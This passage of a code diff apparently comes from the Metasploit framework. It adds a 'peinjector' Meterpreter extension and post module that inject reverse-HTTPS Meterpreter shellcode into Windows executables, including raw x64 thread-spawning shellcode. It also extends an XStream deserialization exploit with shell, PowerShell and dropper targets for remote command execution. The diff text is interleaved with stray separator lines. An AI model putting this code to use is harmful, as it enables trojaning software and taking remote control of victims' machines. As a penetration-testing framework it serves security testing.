"\x48\x83\xEC\x20" + # sub rsp, 32 ; reserve space for the register params
|
||||||
|
|
||||||
|
"\x41\x52" + # push r10 ; push back the return address
|
||||||
|
"\xFF\xE0" + # jmp rax ; Jump into the required function
|
||||||
|
|
||||||
|
# get_next_mod: ;
|
||||||
|
"\x58" + # pop rax ; Pop off the current modules EAT
|
||||||
|
|
||||||
|
# get_next_mod1: ;
|
||||||
|
"\x41\x59" + # pop r9 ; Pop off the current modules hash
|
||||||
|
"\x5A" + # pop rdx ; Restore our position in the module list
|
||||||
|
"\x48\x8B\x12" + # mov rdx, [rdx] ; Get the next module
|
||||||
|
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
|
||||||
|
|
||||||
|
# allocate
|
||||||
|
thread += "\x5d" + # pop rbp
|
||||||
|
"\x49\xc7\xc6" # mov r14, 1abh size of payload... # AUTOMATED ASM: x64 = ['invalid']
|
||||||
|
|
||||||
|
thread += [shellcode.length - 5].pack("V")
|
||||||
|
thread += "\x6a\x40" + # push 40h
|
||||||
|
"\x41\x59" + # pop r9 now 40h
|
||||||
|
"\x68\x00\x10\x00\x00" + # push 1000h
|
||||||
|
"\x41\x58" + # pop r8.. now 1000h
|
||||||
|
"\x4C\x89\xF2" + # mov rdx, r14
|
||||||
|
"\x6A\x00" + # push 0
|
||||||
|
"\x59" + # pop rcx
|
||||||
|
"\x68\x58\xa4\x53\xe5" + # push E553a458
|
||||||
|
"\x41\x5A" + # pop r10
|
||||||
|
"\xff\xd5" + # call rbp
|
||||||
|
"\x48\x89\xc3" + # mov rbx, rax ; Store allocated address in ebx
|
||||||
|
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
|
||||||
|
|
||||||
|
|
||||||
|
thread += "\x48\xc7\xc1" # AUTOMATED ASM: x86 = ['dec eax', 'invalid'] x64 = ['invalid']
|
||||||
|
thread += [shellcode.length - 5].pack("V")
|
||||||
|
|
||||||
|
thread += "\xeb\x43" # AUTOMATED ASM: x86 = ['jmp 0x45'] x64 = ['jmp 0x45']
|
||||||
|
|
||||||
|
# got_payload:
|
||||||
|
thread += "\x5e" + # pop rsi ; Prepare ESI with the source
|
||||||
|
"\xf2\xa4" + # repne movsb ; Copy the payload to RWX memo
|
||||||
|
"\xe8\x00\x00\x00\x00" + # call set_handler ; Configure error handling
|
||||||
|
|
||||||
|
# set_handler:
|
||||||
|
"\x48\x31\xC0" + # xor rax,rax
|
||||||
|
"\x50" + # push rax ; LPDWORD lpThreadId (NULL)
|
||||||
|
"\x50" + # push rax ; DWORD dwCreationFlags (0)
|
||||||
|
"\x49\x89\xC1" + # mov r9, rax ; LPVOID lpParameter (NULL)
|
||||||
|
"\x48\x89\xC2" + # mov rdx, rax ; LPTHREAD_START_ROUTINE (payload)
|
||||||
|
"\x49\x89\xD8" + # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
|
||||||
|
"\x48\x89\xC1" + # mov rcx, rax ; LPSECURITY_ATTRIBUTES (NULL)
|
||||||
|
"\x49\xC7\xC2\x38\x68\x0D\x16" + # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread")
|
||||||
|
"\xFF\xD5" + # call rbp ; Spawn payload thread
|
||||||
|
"\x48\x83\xC4\x58" + # add rsp, 50
|
||||||
|
|
||||||
|
# stackrestore
|
||||||
|
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" + # AUTOMATED ASM: x64 = ['popfq', 'pop r15', 'pop r14', 'pop r13', 'pop r12', 'pop r11', 'pop r10', 'pop r9']
|
||||||
|
"\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58" # AUTOMATED ASM: x64 = ['pop r8', 'pop rbp', 'pop rsp', 'pop rdi', 'pop rsi', 'pop rdx', 'pop rcx', 'pop rbx', 'pop rax']
|
||||||
|
|
||||||
|
thread += "\xe9" # AUTOMATED ASM: x64 = ['invalid']
|
||||||
|
thread += [shellcode.length].pack("V")
|
||||||
|
|
||||||
|
return stackpreserve + thread + shellcode
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -0,0 +1,19 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
module Rex
|
||||||
|
module Post
|
||||||
|
module Meterpreter
|
||||||
|
module Extensions
|
||||||
|
module Peinjector
|
||||||
|
|
||||||
|
TLV_TYPE_PEINJECTOR_SHELLCODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
|
||||||
|
TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
|
||||||
|
TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64 = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
|
||||||
|
TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
|
||||||
|
TLV_TYPE_PEINJECTOR_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
|
||||||
|
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,135 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
require 'rex/post/meterpreter'
|
||||||
|
|
||||||
|
module Rex
|
||||||
|
module Post
|
||||||
|
module Meterpreter
|
||||||
|
module Ui
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# Peinjector extension - inject a given shellcode into an executable file
|
||||||
|
#
|
||||||
|
###
|
||||||
|
class Console::CommandDispatcher::Peinjector
|
||||||
|
|
||||||
|
Klass = Console::CommandDispatcher::Peinjector
|
||||||
|
|
||||||
|
include Console::CommandDispatcher
|
||||||
|
|
||||||
|
#
|
||||||
|
# Name for this dispatcher
|
||||||
|
#
|
||||||
|
def name
|
||||||
|
'Peinjector'
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# List of supported commands.
|
||||||
|
#
|
||||||
|
def commands
|
||||||
|
{
|
||||||
|
'injectpe' => 'Inject a shellcode into a given executable'
|
||||||
|
}
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@@injectpe_opts = Rex::Parser::Arguments.new(
|
||||||
|
'-p' => [true, 'Windows Payload to inject into the targer executable.'],
|
||||||
|
'-t' => [true, 'Path of the target executable to be injected'],
|
||||||
|
'-o' => [true, 'Comma separated list of additional options for payload if needed in \'opt1=val,opt2=val\' format.'],
|
||||||
|
'-h' => [false, 'Help banner']
|
||||||
|
)
|
||||||
|
|
||||||
|
def injectpe_usage
|
||||||
|
print_line('Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >, -o < lhost=192.168.1.123, lport=4443 >')
|
||||||
|
print_line
|
||||||
|
print_line('Inject a shellcode on the target executable.')
|
||||||
|
print_line(@@injectpe_opts.usage)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Inject a given shellcode into a remote executable
|
||||||
|
#
|
||||||
|
def cmd_injectpe(*args)
|
||||||
|
if args.length == 0 || args.include?('-h')
|
||||||
|
injectpe_usage
|
||||||
|
return false
|
||||||
|
end
|
||||||
|
|
||||||
|
opts = {
|
||||||
|
payload: nil,
|
||||||
|
targetpe: nil,
|
||||||
|
options: nil
|
||||||
|
}
|
||||||
|
|
||||||
|
@@injectpe_opts.parse(args) { |opt, idx, val|
|
||||||
|
case opt
|
||||||
|
when '-p'
|
||||||
|
opts[:payload] = val
|
||||||
|
when '-t'
|
||||||
|
opts[:targetpe] = val
|
||||||
|
when '-o'
|
||||||
|
opts[:options] = val
|
||||||
|
end
|
||||||
|
}
|
||||||
|
payload = create_payload(opts[:payload], opts[:options])
|
||||||
|
|
||||||
|
inject_payload(payload, opts[:targetpe])
|
||||||
|
end
|
||||||
|
|
||||||
|
# Create a payload given a name, lhost and lport, additional options
|
||||||
|
def create_payload(name, opts = "")
|
||||||
|
|
||||||
|
pay = client.framework.payloads.create(name)
|
||||||
|
pay.datastore['EXITFUNC'] = 'thread'
|
||||||
|
pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
|
||||||
|
|
||||||
|
if not opts.blank?
|
||||||
|
opts.split(",").each do |o|
|
||||||
|
opt,val = o.split("=",2)
|
||||||
|
pay.datastore[opt] = val
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Validate the options for the module
|
||||||
|
pay.options.validate(pay.datastore)
|
||||||
|
return pay
|
||||||
|
end
|
||||||
|
|
||||||
|
def inject_payload(pay, targetpe)
|
||||||
|
|
||||||
|
begin
|
||||||
|
print_status("Generating payload")
|
||||||
|
raw = pay.generate
|
||||||
|
param = {}
|
||||||
|
|
||||||
|
if pay.arch.join == ARCH_X64
|
||||||
|
threaded_shellcode = client.peinjector.add_thread_x64(raw)
|
||||||
|
param[:isx64] = true
|
||||||
|
else
|
||||||
|
threaded_shellcode = client.peinjector.add_thread_x86(raw)
|
||||||
|
param[:isx64] = false
|
||||||
|
end
|
||||||
|
|
||||||
|
param[:shellcode] = threaded_shellcode
|
||||||
|
param[:targetpe] = targetpe
|
||||||
|
param[:size] = threaded_shellcode.length;
|
||||||
|
|
||||||
|
print_status("Injecting #{pay.name} into the executable #{targetpe}")
|
||||||
|
client.peinjector.inject_shellcode(param)
|
||||||
|
print_good("Successfully injected payload into the executable: #{targetpe}")
|
||||||
|
|
||||||
|
rescue ::Exception => e
|
||||||
|
print_error("Failed to Inject Payload to executable #{targetpe}!")
|
||||||
|
print_error(e.to_s)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
|
||||||
# are needed when there's no database
|
# are needed when there's no database
|
||||||
spec.add_runtime_dependency 'metasploit-model'
|
spec.add_runtime_dependency 'metasploit-model'
|
||||||
# Needed for Meterpreter
|
# Needed for Meterpreter
|
||||||
spec.add_runtime_dependency 'metasploit-payloads', '1.3.43'
|
spec.add_runtime_dependency 'metasploit-payloads', '1.3.45'
|
||||||
# Needed for the next-generation POSIX Meterpreter
|
# Needed for the next-generation POSIX Meterpreter
|
||||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.1'
|
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.1'
|
||||||
# Needed by msfgui and other rpc components
|
# Needed by msfgui and other rpc components
|
||||||
|
|
|
@ -25,7 +25,7 @@ metadata = {
|
||||||
'date': '2018-02-06',
|
'date': '2018-02-06',
|
||||||
|
|
||||||
'references': [
|
'references': [
|
||||||
{'type': 'cve', 'ref': 'CVE-2018-6317'},
|
{'type': 'cve', 'ref': '2018-6317'},
|
||||||
{'type': 'edb', 'ref': '43972'},
|
{'type': 'edb', 'ref': '43972'},
|
||||||
{'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
|
{'type': 'url', 'ref': 'https://github.com/nanopool/Claymore-Dual-Miner'}
|
||||||
],
|
],
|
||||||
|
|
|
@ -37,25 +37,33 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Targets' => [
|
'Targets' => [
|
||||||
['Unix (In-Memory)',
|
['Unix (In-Memory)',
|
||||||
'Platform' => 'unix',
|
'Platform' => 'unix',
|
||||||
'Arch' => ARCH_CMD
|
'Arch' => ARCH_CMD,
|
||||||
|
'Type' => :unix_memory
|
||||||
|
],
|
||||||
|
['Windows (In-Memory)',
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'Type' => :win_memory
|
||||||
],
|
],
|
||||||
['Python (In-Memory)',
|
['Python (In-Memory)',
|
||||||
'Platform' => 'python',
|
'Platform' => 'python',
|
||||||
'Arch' => ARCH_PYTHON
|
'Arch' => ARCH_PYTHON,
|
||||||
|
'Type' => :py_memory
|
||||||
],
|
],
|
||||||
=begin this stuff that doesn't work yet
|
|
||||||
['PowerShell (In-Memory)',
|
['PowerShell (In-Memory)',
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => [ARCH_X86, ARCH_X64]
|
'Arch' => [ARCH_X86, ARCH_X64],
|
||||||
|
'Type' => :psh_memory
|
||||||
],
|
],
|
||||||
=end
|
|
||||||
['Linux (Dropper)',
|
['Linux (Dropper)',
|
||||||
'Platform' => 'linux',
|
'Platform' => 'linux',
|
||||||
'Arch' => [ARCH_X86, ARCH_X64]
|
'Arch' => [ARCH_X86, ARCH_X64],
|
||||||
|
'Type' => :linux_dropper
|
||||||
],
|
],
|
||||||
['Windows (Dropper)',
|
['Windows (Dropper)',
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => [ARCH_X86, ARCH_X64]
|
'Arch' => [ARCH_X86, ARCH_X64],
|
||||||
|
'Type' => :win_dropper
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
|
@ -68,38 +76,34 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
if execute_command(random_crap)
|
return CheckCode::Appears if execute_command(random_crap)
|
||||||
CheckCode::Appears
|
|
||||||
else
|
CheckCode::Safe
|
||||||
CheckCode::Safe
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
case target.name
|
case target['Type']
|
||||||
when /Unix/, /Python/, /PowerShell/
|
when /memory/
|
||||||
execute_command(payload.encoded)
|
execute_command(payload.encoded)
|
||||||
else
|
when /dropper/
|
||||||
execute_cmdstager
|
execute_cmdstager
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Exploit methods
|
|
||||||
#
|
|
||||||
|
|
||||||
def execute_command(cmd, opts = {})
|
def execute_command(cmd, opts = {})
|
||||||
cmd = case target.name
|
cmd =
|
||||||
when /Unix/, /Linux/
|
case target['Type']
|
||||||
%W{/bin/sh -c #{cmd}}
|
when :unix_memory, :linux_dropper
|
||||||
when /Python/
|
%W{/bin/sh -c #{cmd}}
|
||||||
%W{python -c #{cmd}}
|
when :py_memory
|
||||||
when /PowerShell/
|
%W{python -c #{cmd}}
|
||||||
# This doesn't work yet
|
when :psh_memory
|
||||||
%W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
|
opts = {remove_comspec: true, encode_final_payload: true}
|
||||||
when /Windows/
|
payload ? cmd_psh_payload(cmd, payload.arch, opts).split :
|
||||||
%W{cmd.exe /c #{cmd}}
|
%W{powershell.exe -c #{cmd}}
|
||||||
end
|
when :win_memory, :win_dropper
|
||||||
|
%W{cmd.exe /c #{cmd}}
|
||||||
|
end
|
||||||
|
|
||||||
# Encode each command argument with XML entities
|
# Encode each command argument with XML entities
|
||||||
cmd.map! { |arg| arg.encode(xml: :text) }
|
cmd.map! { |arg| arg.encode(xml: :text) }
|
||||||
|
@ -111,7 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'data' => xstream_payload(cmd)
|
'data' => xstream_payload(cmd)
|
||||||
)
|
)
|
||||||
|
|
||||||
check_response(res) || fail_with(Failure::UnexpectedReply, res.inspect)
|
return false unless check_response(res)
|
||||||
|
|
||||||
|
true
|
||||||
end
|
end
|
||||||
|
|
||||||
# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO
|
# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO
|
||||||
|
@ -175,10 +181,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
EOF
|
EOF
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Utility methods
|
|
||||||
#
|
|
||||||
|
|
||||||
def check_response(res)
|
def check_response(res)
|
||||||
res && res.code == 500 && res.body.include?(error_string)
|
res && res.code == 500 && res.body.include?(error_string)
|
||||||
end
|
end
|
||||||
|
@ -188,7 +190,7 @@ EOF
|
||||||
end
|
end
|
||||||
|
|
||||||
def random_crap
|
def random_crap
|
||||||
Rex::Text.rand_text_alphanumeric(rand(42) + 1)
|
Rex::Text.rand_text_alphanumeric(8..42)
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,107 @@
|
||||||
|
require 'rex'
|
||||||
|
require 'msf/core/post/common'
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
|
include Msf::Post::Common
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super( update_info( info,
|
||||||
|
'Name' => 'Peinjector',
|
||||||
|
'Description' => %q{
|
||||||
|
This module will inject a specified windows payload into a target executable.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [ 'Maximiliano Tedesco <maxitedesco1@gmail.com>'],
|
||||||
|
'Platform' => [ 'win' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', "windows/meterpreter/reverse_https"]),
|
||||||
|
OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
|
||||||
|
OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
|
||||||
|
OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),
|
||||||
|
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])
|
||||||
|
]
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Run Method for when run command is issued
|
||||||
|
def run
|
||||||
|
session.core.use('peinjector')
|
||||||
|
|
||||||
|
# syinfo is only on meterpreter sessions
|
||||||
|
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
|
||||||
|
|
||||||
|
# Check that the payload is a Windows one and on the list
|
||||||
|
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
|
||||||
|
print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# Set variables
|
||||||
|
pay_name = datastore['PAYLOAD']
|
||||||
|
lhost = datastore['LHOST']
|
||||||
|
lport = datastore['LPORT']
|
||||||
|
targetpe = datastore['TARGETPE']
|
||||||
|
opts = datastore['OPTIONS']
|
||||||
|
|
||||||
|
# Create payload
|
||||||
|
payload = create_payload(pay_name, lhost, lport, opts)
|
||||||
|
|
||||||
|
# Inject payload
|
||||||
|
inject_payload(payload, targetpe)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Create a payload given a name, lhost and lport, additional options
|
||||||
|
def create_payload(name, lhost, lport, opts = "")
|
||||||
|
|
||||||
|
pay = client.framework.payloads.create(name)
|
||||||
|
pay.datastore['LHOST'] = lhost
|
||||||
|
pay.datastore['LPORT'] = lport
|
||||||
|
pay.datastore['EXITFUNC'] = 'thread'
|
||||||
|
pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
|
||||||
|
|
||||||
|
|
||||||
|
if not opts.blank?
|
||||||
|
opts.split(",").each do |o|
|
||||||
|
opt,val = o.split("=",2)
|
||||||
|
pay.datastore[opt] = val
|
||||||
|
end
|
||||||
|
end
|
||||||
|
# Validate the options for the module
|
||||||
|
pay.options.validate(pay.datastore)
|
||||||
|
return pay
|
||||||
|
end
|
||||||
|
|
||||||
|
def inject_payload(pay, targetpe)
|
||||||
|
|
||||||
|
begin
|
||||||
|
print_status("Generating payload")
|
||||||
|
raw = pay.generate
|
||||||
|
param = {}
|
||||||
|
|
||||||
|
if pay.arch.join == ARCH_X64
|
||||||
|
threaded_shellcode = client.peinjector.add_thread_x64(raw)
|
||||||
|
param[:isx64] = true
|
||||||
|
else
|
||||||
|
threaded_shellcode = client.peinjector.add_thread_x86(raw)
|
||||||
|
param[:isx64] = false
|
||||||
|
end
|
||||||
|
|
||||||
|
param[:shellcode] = threaded_shellcode
|
||||||
|
param[:targetpe] = targetpe
|
||||||
|
param[:size] = threaded_shellcode.length;
|
||||||
|
|
||||||
|
print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")
|
||||||
|
client.peinjector.inject_shellcode(param)
|
||||||
|
print_good("Successfully injected payload into the executable: #{param[:targetpe]}")
|
||||||
|
|
||||||
|
rescue ::Exception => e
|
||||||
|
print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")
|
||||||
|
print_error(e.to_s)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -84,6 +84,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
|
||||||
" CI",
|
" CI",
|
||||||
" Foundstone",
|
" Foundstone",
|
||||||
" FusionVM XML",
|
" FusionVM XML",
|
||||||
|
" Group Policy Preferences Credentials",
|
||||||
" IP Address List",
|
" IP Address List",
|
||||||
" IP360 ASPL",
|
" IP360 ASPL",
|
||||||
" IP360 XML v3",
|
" IP360 XML v3",
|
||||||
|
|
|
@ -21,6 +21,7 @@ RSpec.shared_examples_for 'Msf::DBManager::Import' do
|
||||||
it_should_behave_like 'Msf::DBManager::Import::CI'
|
it_should_behave_like 'Msf::DBManager::Import::CI'
|
||||||
it_should_behave_like 'Msf::DBManager::Import::Foundstone'
|
it_should_behave_like 'Msf::DBManager::Import::Foundstone'
|
||||||
it_should_behave_like 'Msf::DBManager::Import::FusionVM'
|
it_should_behave_like 'Msf::DBManager::Import::FusionVM'
|
||||||
|
it_should_behave_like 'Msf::DBManager::Import::GPP'
|
||||||
it_should_behave_like 'Msf::DBManager::Import::IP360'
|
it_should_behave_like 'Msf::DBManager::Import::IP360'
|
||||||
it_should_behave_like 'Msf::DBManager::Import::IPList'
|
it_should_behave_like 'Msf::DBManager::Import::IPList'
|
||||||
it_should_behave_like 'Msf::DBManager::Import::Libpcap'
|
it_should_behave_like 'Msf::DBManager::Import::Libpcap'
|
||||||
|
|
|
@ -0,0 +1,3 @@
|
||||||
|
RSpec.shared_examples_for 'Msf::DBManager::Import::GPP' do
|
||||||
|
it { is_expected.to respond_to :import_gpp_xml }
|
||||||
|
end
|
Loading…
Reference in New Issue